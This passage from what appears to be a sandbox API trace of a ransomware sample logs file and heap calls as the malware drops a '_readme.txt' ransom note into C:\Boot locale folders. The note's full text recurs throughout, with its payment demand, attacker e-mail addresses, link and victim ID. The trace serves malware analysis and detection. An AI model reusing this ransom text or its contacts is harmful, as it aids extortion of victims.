you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.838] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.838] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.839] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.839] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.839] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.839] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.840] CloseHandle (hObject=0x5cc) returned 1 [0090.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.840] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.840] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.841] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.841] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.841] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa334c6e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.841] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa334c6e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.841] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.841] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.841] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.842] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.842] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.843] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.844] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.844] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0090.844] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.844] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.844] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.844] PathFindFileNameW (pszPath="") returned="" [0090.844] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.845] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.845] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.845] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.845] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0090.845] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.845] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0090.847] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.847] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.847] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need 